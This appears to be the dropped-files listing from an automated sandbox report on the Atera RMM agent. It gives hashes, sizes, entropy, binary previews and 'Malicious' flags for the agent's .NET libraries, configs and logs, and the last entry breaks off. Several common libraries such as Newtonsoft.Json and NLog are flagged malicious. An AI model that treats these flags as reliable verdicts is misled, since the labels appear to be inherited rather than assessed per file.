                                                                                                                                                                                                                                                                                              SHA-512:2FEF83A7668D190297863592FBBC8E766042067138C3A163771CDCF1FB284BC8162EA6B7B958CB076B6AB654216B855324AE292F78931C47EDC33B52376943AD
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...:.R..........." ..0..............3... ...@....... ...............................5....`..................................2..O....@............... ..0(...`.......1..T............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................2......H.......H....1..................81.......................................0..S........-.r...ps!...zs".....o#.....g...%.. .o$......+......(%...,...o&.....X....i2..o'...*..0...........-.r...ps!...zs".....s(.....~o...%-.&~n.........s)...%.o...(...+o+....+X.o,.....(-...-.r...pr...ps....z..o/...&.o0....3(.o1... ....(2.....(3...,....o&.....o4....o5...-....,..o6.....o0...,.rK..pr...ps....z.o'...*.......F.d.......z.-.r...ps!...z.(7....-. o8...*..0..U........-.r...ps!...zs9........+ ..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\System.Runtime.InteropServices.RuntimeInformation.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):27184
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.334370226233819
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:Bn1VM0JrpNWDcIh6leOiDFIFBYp1+/EpYinAMxCw:BnvXYcIh6yFIFBYpc47Hxn
                                                                                                                                                                                                                                                                                              MD5:A964D6B5F323E343E884A1E4EBBA21A3
                                                                                                                                                                                                                                                                                              SHA1:41FEA32C2FCC56070CF904AB441019F963C83ED5
                                                                                                                                                                                                                                                                                              SHA-256:0214D2C78CC1DBE92853305FA12119BBE09EA06B5EB9C4B4E7AD76B6FAF232ED
                                                                                                                                                                                                                                                                                              SHA-512:3E93C094D3B9D77BAE9C1725B452743FDFA0A20EB07FFC50EA861C501821710A2C29197CF43DCEC1BF089A5BC9B8F2BF57F9FD0EC8D9805D00E32538D03CD46C
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Ub.X.........." ..0..8...........W... ...`....... ....................................@.................................dW..O....`...............B..0(..........,V............................................... ............... ..H............text....7... ...8.................. ..`.rsrc........`.......:..............@..@.reloc...............@..............@..B.................W......H.......4%..p/...........T.......U......................................r~....-.(....s.........~....*..*.0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*.......%...(....*.(....,.r...p......%...%...%...(....*.......%...%...(....*..0..A.......(....,!r...p......%...%...%...%...(....*.......%...%...%...(....*2r...p.(....*......(....*2(.....(....*^~....-.(.........~....*..0..........~..........(

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\System.ValueTuple.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):73264
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.955083228632948
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:R784YWac+abptsy5VyYc/9n1RcGxzeeUVn9KyQgHo0JuresehaAR7HxRX:R7N1r9KGI04CCARLX
                                                                                                                                                                                                                                                                                              MD5:FA432B69828C0F175E44B367AF91ED2D
                                                                                                                                                                                                                                                                                              SHA1:C0E72D5C64E9B560311EBD1EC3A35CED46386C78
                                                                                                                                                                                                                                                                                              SHA-256:6718AFA55EF89805B69360C9E88347A39CC302AB3C16590E78136C20DB025613
                                                                                                                                                                                                                                                                                              SHA-512:E0C54D9126C557C24013486A31D5477EFF2B800ADAE472C3103EE1F1CD527546E6DCEFB19D5DCE602AEE6DA7A0290F413CE2C6C09DF28D4333C4E62510FE2064
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....>.Z.........." ..0.................. ... ....... .......................`............@.....................................O.... ..P...............0(...@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc...P.... ......................@..@.reloc.......@......................@..B........................H.......$...h...........................................................6..o.........*f..o...........o.........*...o...........o...........o.........*...o...........o ..........o!...........o"........*...o#..........o$..........o%...........o&...........o'........*....0..L.........o(..........o)..........o*...........o+...........o,...........o-........*.0..Y.........o...........o/..........o0...........o1...........o2...........o3...........o4.... ...*....0..k.........o5....

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\log.txt

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):639
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.827702258558673
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:gSuIytXECSuIy6XEOMrDbSc4ECuZDUSBOQgVSo4Ywr6Vig+hf5r6VigoK4gVX:J+tXM+WVc4E3AQdcwjLJ5jjY
                                                                                                                                                                                                                                                                                              MD5:870C89A93169C04DA04BA45691292853
                                                                                                                                                                                                                                                                                              SHA1:E9A1A7C231D2B90BBF91B1D6FBC4189449D79F6D
                                                                                                                                                                                                                                                                                              SHA-256:4650DB2A312EDE87C199E7E24D2C78E9B1DA03F6A8E5F98DFA6274823431495B
                                                                                                                                                                                                                                                                                              SHA-512:52BAFDB557C05CCFBB936C3E495246FF046A69937AFE995A24A5EA476ED866F003F6D72217249040506A770DDFA2A872C82BF41BE19ED089B3B79C6E240FA595
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:06/01/2025 06:59:11 In Program static constructor, before instantiating _logger06/01/2025 06:59:11 In Program static constructor, after instantiating _logger without using _logger06/01/2025 06:59:11 Starting Main(), logging without using _logger..06/01/2025 06:59:11.543 am: Info: Before PollAll() call written at: 06/01/2025 06:59:11..06/01/2025 06:59:14.089 am: Info: In PollAll() before Poller.PollAll(false) written at: 06/01/2025 06:59:14..06/01/2025 06:59:14.168 am: Info: In PollAll() after Poller.PollAll(false) written at: 06/01/2025 06:59:14..06/01/2025 06:59:14.183 am: Info: After PollAll() call written at: 06/01/2025 06:59:14

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace.zip

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v4.5 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1246506
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.999702247108497
                                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                                              SSDEEP:24576:Ony3ipTOpSfZauTZ0OH58yGrxiVj3WqHvYfUmanGGJFE:OnaSOpGoud0OHGliZWqH3bn/E
                                                                                                                                                                                                                                                                                              MD5:E74D2A16DA1DDB7F9C54F72B8A25897C
                                                                                                                                                                                                                                                                                              SHA1:32379AF2DC1C1CB998DC81270B7D6BE054F7C1A0
                                                                                                                                                                                                                                                                                              SHA-256:A0C2F9479B5E3DA9D7A213EBC59F1DD983881F4FC47A646FFC0A191E07966F46
                                                                                                                                                                                                                                                                                              SHA-512:52B8DE90DC9CA41388EDC9AE637D5B4CE5C872538C87CC3E7D45EDCF8EFF78B0F5743AB4927490ABDA1CFF38F2A19983B7CCC0FE3F854B0EACCA9C9CE28EDA75
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:PK..-.....=O(Y..>.........3...AgentPackageMarketplace/AgentPackageMarketplace.exe....0.......>N......V.^.'....l....f.u*-Dl._.>.u.S.Pl-6.;...].#.S.X..7./...."...Z.....M.$`.,..{....v...B.Q.M7.j4.'.C.G`<s.X.%.....,...<bdR....N....!.$J@.k...55....>1..(P&..-.#p.NwuV=Wb...a....-....q.!.s.LH..(...:..#7...L.7.$6.C.uy....&I.r..e...,w0o.....`.....[.{cg=]..IBiQq.`.X.D.h.......G./..NA.....46....w.....b9rp.J.C*.2.F.....G...~..q.x....u......l..I..b..z..w..v.d!./..U.Y^..J..k<kUo:.n:.W......g$..<.X.>....rQ.5JiJ.+..|.p......C......o/...K......T.....+9..z.."..Yd.f..&.B..QWu.-.@...c4.T.^...#.E...v...B..\.x0..{..."|.a.?.y.......-..W.........8nk.).$sf.2].c>...`....=...0..$.bp...Oh....8x.-.%N/...w.........i....a.QX0.k..k..f..D.vl.f.Q..3....]....$.4..k..y.../...'...a..C.x...@..".8....9...;..&j..G#f......).....l......Y..7.c....PJ...X...^)s[...{.......Jr.Q..+....N.F.I...%OS...=.......5......i....h..(....r..T-ir.=.+.'..'.......r...[..J...l.P....[.q...,.To..h.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exe

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):37936
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.42035670242574
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:GlK72yzFcoUzzxYeHTxwx6/ufD/EpYinAMxCoG:3e9YeHVwYe47Hx6
                                                                                                                                                                                                                                                                                              MD5:EFB4712C8713CB05EB7FE7D87A83A55A
                                                                                                                                                                                                                                                                                              SHA1:C94D106BBA77AECF88540807DA89349B50EA5AE7
                                                                                                                                                                                                                                                                                              SHA-256:30271D8A49C2547AB63A80BC170F42E9F240CF359A844B10BC91340444678E75
                                                                                                                                                                                                                                                                                              SHA-512:3594955AD79A07F75C697229B0DE30C60C2C7372B5A94186A705159A25D2E233E398B9E2DC846B8B47E295DCDDD1765A8287B13456C0A3B3C4E296409A428EF8
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...!............."...0..`............... ........@.. ..............................P.....`.................................Q...O....................l..0(...........~..8............................................ ............... ..H............text...._... ...`.................. ..`.rsrc................b..............@..@.reloc...............j..............@..B........................H....... 5...I...........................................................0..H........(......}......}......~D...%-.&~C.....j...s....%.D...(...+}.......}....*.0.._........{....-.r...ps....z.{....o.....i./2.{....r+..pr...p.{....o....(....(....o.............{....o........:...%.. ..o...........i.0..+......{.....o....-2.{....r...pr...p.{....o....(....(....o............{.....o.....o....o .....-.....ws....%.{....o!...o"...%.{....o#...o$...%.o.......E...{....%-.&.+.(....%-.&.+..(...+

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exe.config

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1295
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.018953579697613
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:JdArdEtPF7NhOXrRH2/BLVv+13vH2/nVQ7uH2/FV0PH2/+w39y:3Ar+z7O7Rgdp+1/gnSagFsg+w3w
                                                                                                                                                                                                                                                                                              MD5:843D2196B96E53ABCAE6F4C243D1A7A6
                                                                                                                                                                                                                                                                                              SHA1:EB28441616660FD53653999595A3309961AA9A54
                                                                                                                                                                                                                                                                                              SHA-256:175C1EBF4B5C56563944E65C9E8AE4595730155D69854499DB638E82E16DF056
                                                                                                                                                                                                                                                                                              SHA-512:2C24DA122963E1BF533FD8A5C841C9BCD86442E0E49D3BE379FBB21AA607FDC6C7D30BA5573615416D55538429652BF1108D88EC8267FDC5D8C8F9ECAF11D0A1
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:.<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup> .. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5" />.. </startup>.. <runtime>.. <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">.. <dependentAssembly>.. <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-12.0.0.0" newVersion="12.0.0.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="Microsoft.ApplicationInsights" publicKeyToken="31bf3856ad364e35" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-2.9.1.0" newVersion="2.9.1.0" />.. </dependentAssembly>.. <dependentAssembly>.. <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />.. <bindingRedirect oldVersion="0.0.0.0-5.0.0.0" newVersion="5.0.0.0" />.. </dependentAssembly

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.ini

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):11
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.459431618637298
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:WhUnn:Wu
                                                                                                                                                                                                                                                                                              MD5:5EDA46A55C61B07029E7202F8CF1781C
                                                                                                                                                                                                                                                                                              SHA1:862EE76FC1E20A9CC7BC1920309AA67DE42F22D0
                                                                                                                                                                                                                                                                                              SHA-256:12BF7EB46CB4CB90FAE054C798B8FD527F42A5EFC8D7833BB4F68414E2383442
                                                                                                                                                                                                                                                                                              SHA-512:4CF17D20064BE9475E45D5F46B4A3400CDB8180E5E375ECAC8145D18B34C8FCA24432A06AEEC937F5BEDC7C176F4EE29F4978530BE20EDBD7FED38966FE989D6
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:version=1.6

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\Atera.AgentPackage.Common.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):102448
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.190700491174632
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:hPAt6+FT+ZGodV5iYbYSWd85e+ZS5sSak42QhLks2OL87HxBg:h2bYbYSWd85I5sSakFQhHL8/g
                                                                                                                                                                                                                                                                                              MD5:266A4736FE6DFEADBC40C66AF39D3871
                                                                                                                                                                                                                                                                                              SHA1:D090E63810691F78F760E55640B81958BC715183
                                                                                                                                                                                                                                                                                              SHA-256:4D6091013BF285AF05D901BA130E86D8CEFDB4E387540C3814929C1277C2DDF8
                                                                                                                                                                                                                                                                                              SHA-512:AB43966CEFC08A8FE9B7A1787948F55A73B243CA6DE7259FD42E5BD4ABAE61D562C9642770708BA38AB6118D3755741529ED51E7DB2A8A811BE8B876F2922A8B
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5*f.........." ..0..^...........}... ........... ....................................`.................................`}..O.......8............h..0(..........(|............................................... ............... ..H............text....]... ...^.................. ..`.rsrc...8............`..............@..@.reloc...............f..............@..B.................}......H........s..|............................................................0..>.......~........o....~......(....&.s.......&...~....(....,..(....&..*...........$...........'........(....*.......*.0..4.......(....o....r...p(....r...p(..........(....(......&..*........00......:.(......}....*..0..Z............( ...,......(!...*~..........("........( ...-..(....s#...........,..($.........(!...*..........&E.......0..G........{....,.(......5~%...r'..po&...rm..pr...po'...tR...r...p((..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\Atera.AgentPackages.CommonLib.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):95280
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.998846079851237
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:GiLY8I1pq2jBTn9kbf0KNGVIYMcoS1JkEX5g7Hxlv:LZ0PMcjrgv
                                                                                                                                                                                                                                                                                              MD5:C6339BD38794C9EB831004955DE64D16
                                                                                                                                                                                                                                                                                              SHA1:EAE04876F94347538735F853B7F14778CB75180F
                                                                                                                                                                                                                                                                                              SHA-256:855D0323807390D8F499355D0030685FBD6DC6939218A15059CB3E9C744AB1A4
                                                                                                                                                                                                                                                                                              SHA-512:F62F76F305285F1C206AEFB8418E48BD2074DEC768C16986353305F34D17524E9A9AEA29AAE11B0D927247161F21039933B3EA68F2BC7F40623B471E123B33F7
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..B..........R`... ........... ...............................+....`.................................._..O....................L..0(..........(_..8............................................ ............... ..H............text...X@... ...B.................. ..`.rsrc................D..............@..@.reloc...............J..............@..B................3`......H........h................................................................(......}......}.......}.......}........o=...}....*..{....*>.{....o.......*v.{....o...........s....(...+*...0..<........{....o.....{....#.......@(....o.....{......o........&.....*........55........{....o.....{....#.......@(....o.....{......o....*..0..$........(......`...%..".o......{.....o....*Z.(....r...po!...o....*..{....o0...r...p.(....(....o&...*6..(....o....*..{....*..{....*.s....z.s....z.s....z.s..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\Atera.Utils.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):51760
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.408406581403349
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:hQMnMYnUFMSptE7C+t2RO3neZN8752vwzE8Kku6ZFMLcyMmEpYinAMxCl5E:h9MYn1seLE8JFMLcyMH7Hx+E
                                                                                                                                                                                                                                                                                              MD5:7F8418A330DA75F653CC1A50F0B91175
                                                                                                                                                                                                                                                                                              SHA1:7448DCCCDB8FBB1CC827FFE4861C7BD529EE85F5
                                                                                                                                                                                                                                                                                              SHA-256:BF780EB84424039CAB84C818D21A402369EC1BDC9136E1CDBB60486343A07723
                                                                                                                                                                                                                                                                                              SHA-512:3CAC7066B3F210D826383CA000CDC581C0CA193800C97F2F34C6139BB4880A12A485604344EF22BADFD4609F2A0E7645E81DECFA8C5BF8C6DF4406BFEE6DBFDA
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0.............r.... ........... ....................................`.....................................O.......4...............0(..........4...T............................................ ............... ..H............text...x.... ...................... ..`.rsrc...4...........................@..@.reloc..............................@..B................R.......H.......XE...q...........................................................0..........(.....o.....s........s............io........,...o.......jo....s....&.o.....O.........io ...&..i.X.O..........i(!.....i(".......(!....(#...*.........*.......0.._........($....s.......(%........i.Yo.....O......jo......s&.......io ...&(........io'.......,..o......*.........FS........((...*2.~....(....*....0...........()...,.r...ps*...z.()...,.r...ps*...z.....~....s+....s,.......o-....[o....o/...

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\Microsoft.ApplicationInsights.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):354352
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.1536791121281995
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6144:4r/iEF3zTxesPlx5zIAUH+2n8G4smIkuxhnCq7a/ZmvYyD:4hpp9xxIBeXGfvYyD
                                                                                                                                                                                                                                                                                              MD5:697D8BC281B58B1FCEEC721B9BC01059
                                                                                                                                                                                                                                                                                              SHA1:DA468B41FDADE096896B6835645DEFF110F438F5
                                                                                                                                                                                                                                                                                              SHA-256:82C4EFE948B812C844DE4950130C292CDC49EDA42F447E17DE6CC451A1F5135E
                                                                                                                                                                                                                                                                                              SHA-512:95877A2E690E083B256F71E376BE757FA0D329A6AAEC193461D325C63867BCE9E72A648EDB17A8817198C5224853541C65F664A6FFB966AE35D9E558F681EF46
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j.Y..........." ..0..8..........nW... ...`....... ...................................`..................................W..O....`...............@..0(..........HV..8............................................ ............... ..H............text....7... ...8.................. ..`.rsrc........`.......:..............@..@.reloc...............>..............@..B................OW......H.......`...ht...................U........................................{*...*..{+...*V.(,.....}*.....}+...*...0..;........u......,/(-....{*....{*...o....,.(/....{+....{+...o0...*.*. S]G. )UU.Z(-....{*...o1...X )UU.Z(/....{+...o2...X*.0...........r...p......%..{*....................-.q.............-.&.+.......o3....%..{+....................-.q.............-.&.+.......o3....(4...*..{5...*..{6...*..{7...*..{8...*..(,.....}5.....}6.....}7......}8...*....0..k........u......,_(-

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\NLog.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):883760
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.071511091364285
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24576:m1n1p9LdRN39aQLU0NnWSo7NReIGeFTiQaMcK2VJNUR10+xMhCJqtgsxUsQ0:m1n1p9LdRN39aQZUq1
                                                                                                                                                                                                                                                                                              MD5:1A5AE803BFFDEBA6B4D9825233D1C23C
                                                                                                                                                                                                                                                                                              SHA1:E324D9B2F417F46FE3364658429B620BC5942322
                                                                                                                                                                                                                                                                                              SHA-256:2BED7E5890D572E41770C422C25CF11F0D3C2D170C5F38F8EB1535E1A3E614C6
                                                                                                                                                                                                                                                                                              SHA-512:D8DCB1E227AD001A2F43C9847E0A22D43DBE7021814AB88DBD168092A3C172D17CB69848F743166E755DB771B55025664C0E53580B9E48252B1581AD281E332A
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..F..........:d... ........... ...............................q....`..................................c..O....................T..0(.......... c..T............................................ ............... ..H............text....D... ...F.................. ..`.rsrc................H..............@..@.reloc...............R..............@..B.................d......H........%...2...........W.......b......................................"..(....*..(....*"..(....*..(....*..(....*..(....*.(....*"..(....*...0..B.......~..........(b...~....,.~.....oc......+...(......od......,..(e....*........../7......"..(....*6.(.....(....*..0..........(.......of...&.*.(....og...*2(.....oc...*....0..?.......~..........(b...~....,.~.....oc...+...(.....oh...&...,..(e....*.........,4.......0..?.......~..........(b...~....,.~....oi......+...(....oj......,..(e..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\Newtonsoft.Json.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):702512
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.943194897994663
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12288:3f9WGsSVSM2mxL2nRiOr8gUckc6V/g2GhBzj05cH3:vXNL2PVh6B+BzjmcX
                                                                                                                                                                                                                                                                                              MD5:F78DB2C6B247E0FFC215A44AE88178D8
                                                                                                                                                                                                                                                                                              SHA1:12FB14AE1CF731115F07076AD939A2ACC57A9920
                                                                                                                                                                                                                                                                                              SHA-256:1DFF434970F52326AA5E0C1164AB76A771A1EE651E37166DF8A3BC3F06204746
                                                                                                                                                                                                                                                                                              SHA-512:AF3F67FA56CA89111E389DE17F9030D979827E8B60AF86E991115B07759D6DADA1B74ED870B5163474192BF58A5FA69EBFB03DFCF087EB88E1E72EC26BB578CB
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0................. ........... ....................................`.....................................O.......................0(..............T............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........z..<&..................<.........................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X.+....b...aX...X...2.....cY.....cY....cY...{...._..{........+,..{[....3...{Z......(....,...{Z...*..{\.......-..*...0...........-.r...ps....z.o......-.~....*.~....X...+....b..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\Polly.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
